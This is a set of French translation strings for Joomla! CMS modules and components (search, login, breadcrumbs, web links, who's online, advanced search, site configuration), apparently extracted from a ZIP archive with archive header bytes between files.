COM_SEARCH_ALL_WORDS="Tous les mots"
COM_SEARCH_ALPHABETICAL="Alphabétique"
COM_SEARCH_ANY_WORDS="N'importe quel mot"
COM_SEARCH_ERROR_ENTERKEYWORD="Saisissez un mot-clé à rechercher"
COM_SEARCH_ERROR_IGNOREKEYWORD="Un ou plusieurs mots-clés ont été ignorés lors de cette recherche"
COM_SEARCH_ERROR_SEARCH_MESSAGE="Les mots recherchés doivent comporter entre %1$s et %2$s caractères"
COM_SEARCH_EXACT_PHRASE="Phrase exacte"
COM_SEARCH_FIELD_SEARCH_PHRASES_DESC="Afficher les options de recherche"
COM_SEARCH_FIELD_SEARCH_PHRASES_LABEL="Utiliser les options de recherche"
COM_SEARCH_FIELD_SEARCH_AREAS_DESC="Utiliser les champs de recherche (avec cases à cocher)"
COM_SEARCH_FIELD_SEARCH_AREAS_LABEL="Utiliser les champs de recherche"
COM_SEARCH_FOR="Rechercher :"
COM_SEARCH_MOST_POPULAR="Les plus populaires"
COM_SEARCH_NEWEST_FIRST="Le plus récent en premier"
COM_SEARCH_OLDEST_FIRST="Le plus ancien en premier"
COM_SEARCH_ORDERING="Classement :"
COM_SEARCH_SEARCH="Rechercher"
COM_SEARCH_SEARCH_AGAIN="Rechercher de nouveau"
COM_SEARCH_SEARCH_KEYWORD="Élément à rechercher :"
COM_SEARCH_SEARCH_KEYWORD_N_RESULTS_1="<strong>Total : Un résultat trouvé.</strong>"
COM_SEARCH_SEARCH_KEYWORD_N_RESULTS="<strong>Total : %s résultats trouvés.</strong>"
COM_SEARCH_SEARCH_ONLY="Rechercher uniquement dans :"
COM_SEARCH_SEARCH_RESULT="Résultat de la recherche"
PK!�"vrfr-FR/fr-FR.mod_login.sys.ininu&1i�; @date        2015-10-15
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_LOGIN="Connexion"
MOD_LOGIN_XML_DESCRIPTION="Le module 'mod_login' affiche un formulaire d'identification pour se connecter sur le site et, selon les paramètres choisis, un lien pour récupérer l'identifiant si oublié, régénérer un nouveau mot de passe et, créer un compte si l'inscription des utilisateurs est autorisée (voir Utilisateurs->Paramètres)."
MOD_LOGIN_LAYOUT_DEFAULT="Défaut"

PK!�%v__#fr-FR/fr-FR.mod_breadcrumbs.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_BREADCRUMBS="Fil de navigation"
MOD_BREADCRUMBS_XML_DESCRIPTION="Le module 'mod_breadcrumbs' affiche un fil de navigation dans le site permettant à l'utilisateur de savoir où il se situe."
MOD_BREADCRUMBS_LAYOUT_DEFAULT="Défaut"

PK!�U�		fr-FR/fr-FR.mod_breadcrumbs.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_BREADCRUMBS="Fil de navigation"
MOD_BREADCRUMBS_FIELD_HOMETEXT_DESC="Spécifier le nom à utiliser pour la racine du fil de navigation, correspondant à la page d'accueil."
MOD_BREADCRUMBS_FIELD_HOMETEXT_LABEL="Texte de page d'accueil"
MOD_BREADCRUMBS_FIELD_SEPARATOR_DESC="Spécifier le caractère à utiliser pour séparer les éléments du fil de navigation."
MOD_BREADCRUMBS_FIELD_SEPARATOR_LABEL="Séparateur de texte"
MOD_BREADCRUMBS_FIELD_SHOWHERE_DESC="Afficher/Masquer le texte d'introduction 'Vous êtes ici' dans le fil de navigation."
MOD_BREADCRUMBS_FIELD_SHOWHERE_LABEL="Intro 'Vous êtes ici'"
MOD_BREADCRUMBS_FIELD_SHOWHOME_DESC="Afficher/Masquer la page d'accueil correspondant à la racine du fil de navigation."
MOD_BREADCRUMBS_FIELD_SHOWHOME_LABEL="Page d'accueil"
MOD_BREADCRUMBS_FIELD_SHOWLAST_DESC="Afficher/Masquer le dernier élément du fil de navigation."
MOD_BREADCRUMBS_FIELD_SHOWLAST_LABEL="Dernier élément"
MOD_BREADCRUMBS_HERE="Vous êtes ici : "
MOD_BREADCRUMBS_HOME="Accueil"
MOD_BREADCRUMBS_XML_DESCRIPTION="Le module 'mod_breadcrumbs' affiche un fil de navigation dans le site permettant à l'utilisateur de savoir où il se situe."
PK!�(T��fr-FR/fr-FR.mod_search.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_SEARCH="Recherche"
MOD_SEARCH_XML_DESCRIPTION="Le module 'mod_search' affiche un champ pour effectuer des recherches dans les contenus du site. Les contenus pris en compte sont déterminés par les plug-ins de recherche. Les résultats sont affichés par le composant de recherche."
MOD_SEARCH_LAYOUT_DEFAULT="Défaut"

PK!����

fr-FR/fr-FR.mod_search.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_SEARCH="Recherche"
MOD_SEARCH_FIELD_BOXWIDTH_DESC="Spécifiez par une valeur numérique la largeur du champ correspondant au nombre de caractères pleins affichés."
MOD_SEARCH_FIELD_BOXWIDTH_LABEL="Largeur du champ"
MOD_SEARCH_FIELD_BUTTON_DESC="Activer/Désactiver l'affichage du bouton de recherche. Si le bouton de recherche n'est pas affiché, les utilisateurs devront appuyer sur la touche 'Enter' pour valider la recherche."
MOD_SEARCH_FIELD_BUTTON_LABEL="Bouton de recherche"
MOD_SEARCH_FIELD_BUTTONPOS_DESC="Spécifiez la position du bouton par rapport au champ de recherche."
MOD_SEARCH_FIELD_BUTTONPOS_LABEL="Position du bouton"
MOD_SEARCH_FIELD_BUTTONTEXT_DESC="Spécifiez le texte à afficher sur le bouton de recherche. Si laissé vide, le texte déterminé dans le fichier de langue sera utilisé."
MOD_SEARCH_FIELD_BUTTONTEXT_LABEL="Texte du bouton"
MOD_SEARCH_FIELD_IMAGEBUTTON_DESC="Activer/Désactiver l'utilisation d'une image pour le bouton. L'image doit être nommée 'searchButton.gif' et placée dans le dossier 'templates/nom-du-template/images/'."
MOD_SEARCH_FIELD_IMAGEBUTTON_LABEL="Image du bouton"
MOD_SEARCH_FIELD_SETITEMID_DESC="Si aucun lien de menu du composant de recherche n'est créé permettant de paramétrer l'affichage des résultats, vous pouvez assigner une id en sélectionnant un lien de menu pour que l'affichage hérite de ses paramètres. Si vous ne savez pas ce que ceci signifie, vous n'en avez sans doute pas besoin."
MOD_SEARCH_FIELD_SETITEMID_LABEL="ID de menu"
MOD_SEARCH_FIELD_LABEL_TEXT_DESC="Spécifiez le texte à afficher comme label du champ de recherche. Si laissé vide, le texte déterminé dans le fichier de langue sera utilisé."
MOD_SEARCH_FIELD_LABEL_TEXT_LABEL="Label du champ"
MOD_SEARCH_FIELD_OPENSEARCH_LABEL="Découverte automatique OpenSearch"
MOD_SEARCH_FIELD_OPENSEARCH_TEXT_LABEL="Titre OpenSearch"
MOD_SEARCH_FIELD_OPENSEARCH_TEXT_DESC="Texte affiché dans les navigateurs compatibles lorsque le site est ajouté comme moteur de recherche."
MOD_SEARCH_FIELD_OPENSEARCH_DESC="Certains navigateurs peuvent ajouter cette fonction de recherche de votre site si le paramètre est activé."
MOD_SEARCH_FIELD_TEXT_DESC="Spécifiez le texte à afficher dans le champ de recherche. Si laissé vide, le texte déterminé dans le fichier de langue sera utilisé."
MOD_SEARCH_FIELD_TEXT_LABEL="Texte dans le champ"
MOD_SEARCH_FIELD_VALUE_BOTTOM="Bas"
MOD_SEARCH_FIELD_VALUE_LEFT="Gauche"
MOD_SEARCH_FIELD_VALUE_RIGHT="Droite"
MOD_SEARCH_FIELD_VALUE_TOP="Haut"
MOD_SEARCH_LABEL_TEXT="Rechercher"
MOD_SEARCH_SEARCHBOX_TEXT="Recherche..."
MOD_SEARCH_SEARCHBUTTON_TEXT="Valider"
MOD_SEARCH_SELECT_MENU_ITEMID="Sélectionner un lien de menu"
MOD_SEARCH_XML_DESCRIPTION="Le module 'mod_search' affiche un champ pour effectuer des recherches dans les contenus du site. Les contenus pris en compte sont déterminés par les plug-ins de recherche. Les résultats sont affichés par le composant de recherche."
PK!O�ݱ��fr-FR/fr-FR.com_newsfeeds.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_NEWSFEEDS_CACHE_DIRECTORY_UNWRITABLE="Le répertoire du cache est protégé en écriture. Les fils d'actualité ne peuvent pas être affichés. SVP contacter l'administrateur du site."
COM_NEWSFEEDS_CAT_NUM="# Fils d'actualité :"
COM_NEWSFEEDS_CONTENT_TYPE_NEWSFEED="Fil d'actualité"
COM_NEWSFEEDS_CONTENT_TYPE_CATEGORY="Catégorie de fils d'actualités"
COM_NEWSFEEDS_DEFAULT_PAGE_TITLE="Fils d'actualité"
COM_NEWSFEEDS_ERROR_FEED_NOT_FOUND="Erreur. Le fil d'actualité ne peut être trouvé."
COM_NEWSFEEDS_ERRORS_FEED_NOT_RETRIEVED="Erreur. Le fil d'actualité ne peut être récupéré."
COM_NEWSFEEDS_FEED_LINK="Adresse du fil d'actualité"
COM_NEWSFEEDS_FEED_NAME="Nom du fil d'actualité"
COM_NEWSFEEDS_FILTER_LABEL="Champ de filtre"
COM_NEWSFEEDS_FILTER_SEARCH_DESC="Filtre de recherche dans les fils d'actualité."
COM_NEWSFEEDS_NO_ARTICLES="Aucun article pour ce fil d'actualité"
COM_NEWSFEEDS_NUM_ARTICLES="Nb d'article"
COM_NEWSFEEDS_NUM_ARTICLES_COUNT="Nb d'articles : %s"
COM_NEWSFEEDS_NUM_ITEMS="# Fils d'actualité"
PK!VƆ#��fr-FR/fr-FR.com_wrapper.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_WRAPPER_NO_IFRAMES="Cette option ne fonctionnera pas correctement. Malheureusement, votre navigateur ne supporte pas les frames."

PK!�x8oo"fr-FR/fr-FR.mod_whosonline.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_WHOSONLINE="Qui est en ligne ?"
MOD_WHOSONLINE_XML_DESCRIPTION="Le module 'mod_whosonline' affiche le nombre de visiteurs anonymes (public) et d'utilisateurs connectés qui sont en train de visiter le site."
MOD_WHOSONLINE_LAYOUT_DEFAULT="Défaut"

PK!�[��� fr-FR/fr-FR.files_joomla.sys.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


FILES_JOOMLA="Joomla CMS"
FILES_JOOMLA_ERROR_FILE_FOLDER="Erreur de suppression du dossier ou fichier %s"
FILES_JOOMLA_ERROR_MANIFEST="Erreur de mise à jour du cache manifest (type, élément, dossier, client) : = (%s, %s, %s, %s)"
FILES_JOOMLA_XML_DESCRIPTION="Joomla! 3 - Système de gestion de contenu (CMS)"

PK!�b|���fr-FR/fr-FR.mod_weblinks.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_WEBLINKS="Liens web"
MOD_WEBLINKS_FIELD_CATEGORY_DESC="Sélectionnez la catégorie de liens web à afficher."
MOD_WEBLINKS_FIELD_GROUPBY_DESC="Si oui, les liens Web seront regroupés par sous-catégories."
MOD_WEBLINKS_FIELD_GROUPBY_LABEL="Regroupement par sous-catégories"
MOD_WEBLINKS_FIELD_GROUPBYSHOWTITLE_DESC="Si oui, les titres de groupes seront affichés (valable uniquement si regroupement)."
MOD_WEBLINKS_FIELD_GROUPBYSHOWTITLE_LABEL="Afficher les titres des groupes"
MOD_WEBLINKS_FIELD_GROUPBYORDERING_DESC="Ordre des sous-catégories (valable uniquement si regroupement)."
MOD_WEBLINKS_FIELD_GROUPBYORDERING_LABEL="Ordre de regroupement"
MOD_WEBLINKS_FIELD_GROUPBYDIRECTION_DESC="Tri des sous-catégories (valable uniquement si regroupement)."
MOD_WEBLINKS_FIELD_GROUPBYDIRECTION_LABEL="Tri des regroupements "
MOD_WEBLINKS_FIELD_COLUMNS_DESC="Nombre de colonnes pour diviser le tri lors du regroupement par sous-catégories."
MOD_WEBLINKS_FIELD_COLUMNS_LABEL="Colonnes"
MOD_WEBLINKS_FIELD_COUNT_DESC="Spécifiez par une valeur numérique le nombre de liens web à afficher (5 par défaut)."
MOD_WEBLINKS_FIELD_COUNT_LABEL="Nombre de liens"
MOD_WEBLINKS_FIELD_COUNTCLICKS_DESC="Activer/Désactiver l'enregistrement du nombre de clics sur les liens."
MOD_WEBLINKS_FIELD_COUNTCLICKS_LABEL="Compter les clics"
MOD_WEBLINKS_FIELD_DESCRIPTION_DESC="Activer/Désactiver la description des liens web."
MOD_WEBLINKS_FIELD_DESCRIPTION_LABEL="Description"
MOD_WEBLINKS_FIELD_FOLLOW_DESC="Activer/Désactiver le suivi des liens par les moteurs de recherche (follow / nofollow)."
MOD_WEBLINKS_FIELD_FOLLOW_LABEL="Suivi des liens"
MOD_WEBLINKS_FIELD_HITS_DESC="Montrer le nombre de clics"
MOD_WEBLINKS_FIELD_HITS_LABEL="Clics"
MOD_WEBLINKS_FIELD_ORDERDIRECTION_DESC="Sélectionnez le sens du tri à appliquer à l'affichage en liste des liens."
MOD_WEBLINKS_FIELD_ORDERDIRECTION_LABEL="Sens du tri"
MOD_WEBLINKS_FIELD_ORDERING_DESC="Sélectionnez le type de tri à appliquer à l'affichage en liste des liens."
MOD_WEBLINKS_FIELD_ORDERING_LABEL="Type de tri"
MOD_WEBLINKS_FIELD_TARGET_DESC="Sélectionnez le type de fenêtre dans laquelle la cible du lien doit s'ouvrir ."
MOD_WEBLINKS_FIELD_TARGET_LABEL="Fenêtre cible"
MOD_WEBLINKS_FIELD_VALUE_ASCENDING="Ascendant"
MOD_WEBLINKS_FIELD_VALUE_DESCENDING="Descendant"
MOD_WEBLINKS_FIELD_VALUE_FOLLOW="Oui"
MOD_WEBLINKS_FIELD_VALUE_HITS="Clics"
MOD_WEBLINKS_FIELD_VALUE_NOFOLLOW="Non"
MOD_WEBLINKS_FIELD_VALUE_ORDER="Classement"
MOD_WEBLINKS_HITS="Clics"
MOD_WEBLINKS_XML_DESCRIPTION="Le module 'mod_weblinks' affiche une liste de liens définis dans le composant de liens web."
PK!H���__+fr-FR/fr-FR.mod_articles_categories.sys.ininu&1i�; @date        2015-01-31
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_CATEGORIES="Articles - Catégories"
MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION="Le module 'mod_articles_categories' affiche une liste des catégories d'une catégorie parente."
MOD_ARTICLES_CATEGORIES_LAYOUT_DEFAULT="Défaut"

PK!ł55
5
fr-FR/fr-FR.com_config.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_CONFIG="Services Administrateur"
COM_CONFIG_CONFIGURATION="Configuration des services Administrateur"
COM_CONFIG_ERROR_CONTROLLER_NOT_FOUND="Controller introuvable!"
COM_CONFIG_FIELD_DEFAULT_ACCESS_LEVEL_DESC="Sélectionnez le niveau d'accès par défaut pour les nouveaux éléments créés sur le site (articles, lien de menu, lien web, etc.)."
COM_CONFIG_FIELD_DEFAULT_ACCESS_LEVEL_LABEL="Accès par défaut"
COM_CONFIG_FIELD_DEFAULT_LIST_LIMIT_DESC="Fixer (pour tous les utilisateurs) le nombre d'éléments listés par page dans les affichages en liste de l'administration."
COM_CONFIG_FIELD_DEFAULT_LIST_LIMIT_LABEL="Longueur des listes"
COM_CONFIG_FIELD_METADESC_DESC="La métadonnée 'description' permet d'indexer une description du site afin d'améliorer son référencement (~250 caractères).<br />Lorsque l'article est indexé par un moteur dans les résultats d'une recherche, le texte de cette métadonnée est affiché sous le titre."
COM_CONFIG_FIELD_METADESC_LABEL="Description du site"
COM_CONFIG_FIELD_METAKEYS_DESC="La métadonnée 'keywords' permet d'indexer une série de mots-clés ou d'expressions (séparés par une virgule) liés au thème de l'article."
COM_CONFIG_FIELD_METAKEYS_LABEL="Mots-clés du site"
COM_CONFIG_FIELD_SEF_URL_DESC="Activer la réécriture des URL en clair en remplaçant l'URL contenant la requête de construction de la page par une URL construite d'après les alias de titre.<br />L'élément 'index.php/' est ajouté entre le nom de domaine et le reste de l'URL.<br />Exemple : www.mon-site.com/index.php/ma-page"
COM_CONFIG_FIELD_SEF_URL_LABEL="Réécriture d'URL en clair (SEF)"
COM_CONFIG_FIELD_SITE_NAME_DESC="Saisissez un nom pour le site, affiché par exemple dans la barre de titre du navigateur ou sur la page du site lorsqu'il est mis hors-ligne."
COM_CONFIG_FIELD_SITE_NAME_LABEL="Nom du site"
COM_CONFIG_FIELD_VALUE_AFTER="Après"
COM_CONFIG_FIELD_VALUE_BEFORE="Avant"
COM_CONFIG_FIELD_SITE_OFFLINE_DESC="Choisissez si l'accès du site doit être verrouillé au public.<br />Si oui, un message sera affiché ou non selon les paramètres définis côté administration."
COM_CONFIG_FIELD_SITE_OFFLINE_LABEL="Site hors-ligne"
COM_CONFIG_FIELD_SITENAME_PAGETITLES_DESC="Ajouter le nom du site devant le titre des pages affiché dans la barre de titre du navigateur. Exemple : Mon Site - Nom de l'article."
COM_CONFIG_FIELD_SITENAME_PAGETITLES_LABEL="Nom du site dans les titres de pages"
COM_CONFIG_METADATA_SETTINGS="Paramètres des métadonnées"
COM_CONFIG_MODULES_MODULE_NAME="Nom du module"
COM_CONFIG_MODULES_MODULE_TYPE="Type de module"
COM_CONFIG_MODULES_SETTINGS_TITLE="Paramètres du module"
COM_CONFIG_MODULES_SAVE_SUCCESS="Module enregistré."
COM_CONFIG_SAVE_SUCCESS="Configuration enregistrée."
COM_CONFIG_SEO_SETTINGS="Paramètres SEO"
COM_CONFIG_SITE_SETTINGS="Paramètres du site"
COM_CONFIG_TEMPLATE_SETTINGS="Paramètres du template"
COM_CONFIG_XML_DESCRIPTION="Gestionnaire de configuration de l'administration côté site"
PK!g�fr-FR/fr-FR.mod_whosonline.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_WHOSONLINE="Qui est en ligne ?"
MOD_WHOSONLINE_FIELD_FILTER_GROUPS_DESC="Activer/Désactiver l'affichage par groupe des utilisateurs en ligne."
MOD_WHOSONLINE_FIELD_FILTER_GROUPS_LABEL="Afficher par groupe"
MOD_WHOSONLINE_FIELD_LINKTOWHAT_DESC="Sélectionnez le type d'information à afficher par le lien sur les utilisateurs connectés."
MOD_WHOSONLINE_FIELD_LINKTOWHAT_LABEL="Informations"
MOD_WHOSONLINE_FIELD_VALUE_BOTH="Les deux"
MOD_WHOSONLINE_FIELD_VALUE_CONTACT="Contact"
MOD_WHOSONLINE_FIELD_VALUE_NAMES="Nom des utilisateurs"
MOD_WHOSONLINE_FIELD_VALUE_NUMBER="# invités et inscrits"
MOD_WHOSONLINE_FIELD_VALUE_PROFILE="Profil"
MOD_WHOSONLINE_GUESTS="%s&#160;invités"
MOD_WHOSONLINE_GUESTS_1="un invité"
MOD_WHOSONLINE_GUESTS_0="aucun invité"
MOD_WHOSONLINE_MEMBERS="%s&#160;inscrits"
MOD_WHOSONLINE_MEMBERS_1="un membre"
MOD_WHOSONLINE_MEMBERS_0="aucun membre"
MOD_WHOSONLINE_SAME_GROUP_MESSAGE="Liste des utilisateurs de votre groupe ou ses groupes enfants."
MOD_WHOSONLINE_SHOWMODE_DESC="Sélectionnez les éléments à afficher sur les utilisateurs en ligne."
MOD_WHOSONLINE_SHOWMODE_LABEL="Affichage"
MOD_WHOSONLINE_XML_DESCRIPTION="Le module 'mod_whosonline' affiche le nombre de visiteurs anonymes (public) et d'utilisateurs connectés qui sont en train de visiter le site."
; frontend display
; in the following string
; %1$s is for guests and %2$s for members
MOD_WHOSONLINE_WE_HAVE="Nous avons %1$s et %2$s en ligne"
PK!�ҵEEfr-FR/fr-FR.mod_finder.ininu&1i�; @date        2015-01-31
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


; Strings going to the component
COM_FINDER_FILTER_BRANCH_LABEL="Rechercher par %s"
COM_FINDER_FILTER_SELECT_ALL_LABEL="Rechercher tous"
COM_FINDER_ADVANCED_SEARCH="Recherche avancée"
COM_FINDER_SELECT_SEARCH_FILTER="- Aucun filtre -"

; Module strings
MOD_FINDER="Recherche avancée"
MOD_FINDER_CONFIG_OPTION_BOTTOM="Bas"
MOD_FINDER_CONFIG_OPTION_TOP="Haut"
MOD_FINDER_FIELDSET_ADVANCED_ALT_DESCRIPTION="Label personnalisé pour le champ de recherche remplaçant celui par défaut issu des fichiers langue."
MOD_FINDER_FIELDSET_ADVANCED_ALT_LABEL="Label personnalisé"
MOD_FINDER_FIELDSET_ADVANCED_BUTTON_POS_DESCRIPTION="Position du bouton de recherche par rapport au champ de recherche."
MOD_FINDER_FIELDSET_ADVANCED_BUTTON_POS_LABEL="Position du bouton"
MOD_FINDER_FIELDSET_ADVANCED_FIELD_SIZE_DESCRIPTION="Largeur du champ de recherche selon le nombre de caractères."
MOD_FINDER_FIELDSET_ADVANCED_FIELD_SIZE_LABEL="Taille du champ"
MOD_FINDER_FIELDSET_ADVANCED_LABEL_POS_DESCRIPTION="Position du label de recherche par rapport au champ de recherche."
MOD_FINDER_FIELDSET_ADVANCED_LABEL_POS_LABEL="Position du label"
MOD_FINDER_FIELDSET_ADVANCED_SETITEMID_DESCRIPTION="Assigner un ItemID pour l'affichage des résultats de recherche s'il n'y a pas d'élément de menu com_finder et qu'un affichage spécifique est désiré. Si vous ne comprenez pas ce dont il s'agit, vous n'en avez probablement pas besoin."
MOD_FINDER_FIELDSET_ADVANCED_SETITEMID_LABEL="Assigner un ItemID"
MOD_FINDER_FIELDSET_ADVANCED_SHOW_BUTTON_DESCRIPTION="Spécifiez si un bouton de recherche doit être affiché ou non (la touche ENTER du clavier fait office de bouton)."
MOD_FINDER_FIELDSET_ADVANCED_SHOW_BUTTON_LABEL="Bouton de recherche"
MOD_FINDER_FIELDSET_ADVANCED_SHOW_LABEL_DESCRIPTION="Spécifiez si le label doit être affiché ou non dans le champ de recherche."
MOD_FINDER_FIELDSET_ADVANCED_SHOW_LABEL_LABEL="Label dans le champ"
MOD_FINDER_FIELDSET_BASIC_AUTOSUGGEST_DESCRIPTION="Spécifiez si les suggestions de recherche doivent être affichées ou non."
MOD_FINDER_FIELDSET_BASIC_AUTOSUGGEST_LABEL="Suggestions de recherche"
MOD_FINDER_FIELDSET_BASIC_SEARCHFILTER_DESCRIPTION="La sélection ici d'un filtre de recherche limitera les recherches utilisant le filtre de recherche du module."
MOD_FINDER_FIELDSET_BASIC_SEARCHFILTER_LABEL="Filtre de recherche"
MOD_FINDER_FIELDSET_BASIC_SHOW_ADVANCED_DESCRIPTION="Paramètre d'affichage des options de la recherche avancée."
MOD_FINDER_FIELDSET_BASIC_SHOW_ADVANCED_LABEL="Recherche avancée"
MOD_FINDER_FIELDSET_BASIC_SHOW_ADVANCED_OPTION_LINK="Lien vers le composant"
MOD_FINDER_FIELD_OPENSEARCH_DESCRIPTION="Si cette option est activée, certains navigateurs peuvent intégrer votre site comme moteur de recherche."
MOD_FINDER_FIELD_OPENSEARCH_LABEL="Détection OpenSearch"
MOD_FINDER_FIELD_OPENSEARCH_TEXT_DESCRIPTION="Texte affiché dans les navigateurs (compatibles) lorsque votre site est intégrer comme moteur de recherche."
MOD_FINDER_FIELD_OPENSEARCH_TEXT_LABEL="Titre OpenSearch"
MOD_FINDER_SEARCHBUTTON_TEXT="Rechercher"
MOD_FINDER_SEARCH_BUTTON="Aller"
MOD_FINDER_SEARCH_VALUE="Recherche..."
MOD_FINDER_SELECT_MENU_ITEMID="Choisir un élément de menu"
MOD_FINDER_XML_DESCRIPTION="Module pour le système de recherche avancée."
PK!jjY$$fr-FR/fr-FR.com_messages.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_MESSAGES_ERR_SEND_FAILED="L'utilisateur a verrouillé sa boîte aux lettres. Échec de l'envoi du message."
COM_MESSAGES_NEW_MESSAGE="Nouveau message de la part de %1$s sur le site %2$s"
; The following string is deprecated and will be removed in Joomla 4.0
COM_MESSAGES_NEW_MESSAGE_ARRIVED="Un nouveau message privé a été reçu de la part de %s"
COM_MESSAGES_PLEASE_LOGIN="Veuillez vous connecter à %s pour lire ce message."
PK!/�f=��$fr-FR/fr-FR.mod_articles_popular.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_POPULAR="Articles les plus consultés"
MOD_POPULAR_FIELD_CATEGORY_DESC="Sélectionnez les articles d'une ou plusieurs catégories.<br />Si aucune sélection n'est faite, toutes les catégories seront utilisées."
MOD_POPULAR_FIELD_COUNT_DESC="Nombre de titres d'articles à afficher (5 par défaut)"
MOD_POPULAR_FIELD_COUNT_LABEL="Nombre"
MOD_POPULAR_FIELD_FEATURED_DESC="Afficher/Masquer les articles 'en vedette'"
MOD_POPULAR_FIELD_FEATURED_LABEL="Articles 'en vedette'"
MOD_POPULAR_XML_DESCRIPTION="Le module 'mod_articles_popular' affiche la liste des articles publiés les plus populaires déterminés par leur nombre d'affichages."
MOD_POPULAR_FIELD_DATEFIELD_DESC="Choisir le champ de date à appliquer pour le filtre de date ."
MOD_POPULAR_FIELD_DATEFIELD_LABEL="Champ de date"
MOD_POPULAR_FIELD_DATEFILTERING_DESC="Type de filtre de date"
MOD_POPULAR_FIELD_DATEFILTERING_LABEL="Filtre de date"
MOD_POPULAR_FIELD_ENDDATE_DESC="Si 'Plage de dates' est sélectionné ci-dessus, merci de choisir une date de fin."
MOD_POPULAR_FIELD_ENDDATE_LABEL="Date de fin"
MOD_POPULAR_FIELD_STARTDATE_DESC="Si 'Plage de dates' est sélectionné ci-dessus, merci de choisir une date de début."
MOD_POPULAR_FIELD_STARTDATE_LABEL="Date de début"
MOD_POPULAR_FIELD_RELATIVEDATE_DESC="Si 'Date relative' est sélectionné ci-dessus, merci de saisir une valeur numérique de nombre de jours. Les résultats affichés seront relatifs à la date courante et la valeur saisie."
MOD_POPULAR_FIELD_RELATIVEDATE_LABEL="Date relative"
MOD_POPULAR_OPTION_CREATED_VALUE="Date de création"
MOD_POPULAR_OPTION_DATERANGE_VALUE="Plage de dates"
MOD_POPULAR_OPTION_MODIFIED_VALUE="Date de modification"
